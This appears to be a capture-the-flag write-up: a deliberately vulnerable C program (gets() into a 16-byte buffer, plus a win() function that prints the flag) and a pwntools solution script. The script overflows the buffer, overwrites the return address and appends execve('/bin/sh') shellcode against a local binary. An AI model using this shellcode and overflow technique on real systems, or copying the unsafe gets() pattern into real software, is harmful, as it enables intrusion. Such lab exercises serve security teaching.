THANK YOU CHRISTOS
#include <stdio.h>
#include <string.h>
int main(){
printf("Do you like jump ROPing?\\n");
vuln_func();
}
void vuln_func(){
char input[16];
gets(input);
printf("I actually don't care about your opinions. Cry about it");
}
void win(){
system("/bin/cat flag.txt");
}
Solution
from pwn import *
import struct
shellcode = b""
shellcode += b"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73"
shellcode += b"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89"
shellcode += b"\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b"
shellcode += b"\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80"
#payload = b'A'*28 + b'\\x9b\\xfa\\x0c\\x08' + shellcode
payload = b'A'*28 + b'\\x07\\x98\\x04\\x08' + shellcode
p = process('./tc2')
#gdb.attach(p)
p.sendline(payload)
p.interactive()
The first payload fails because that rop gadget is in the .rodata (read only data)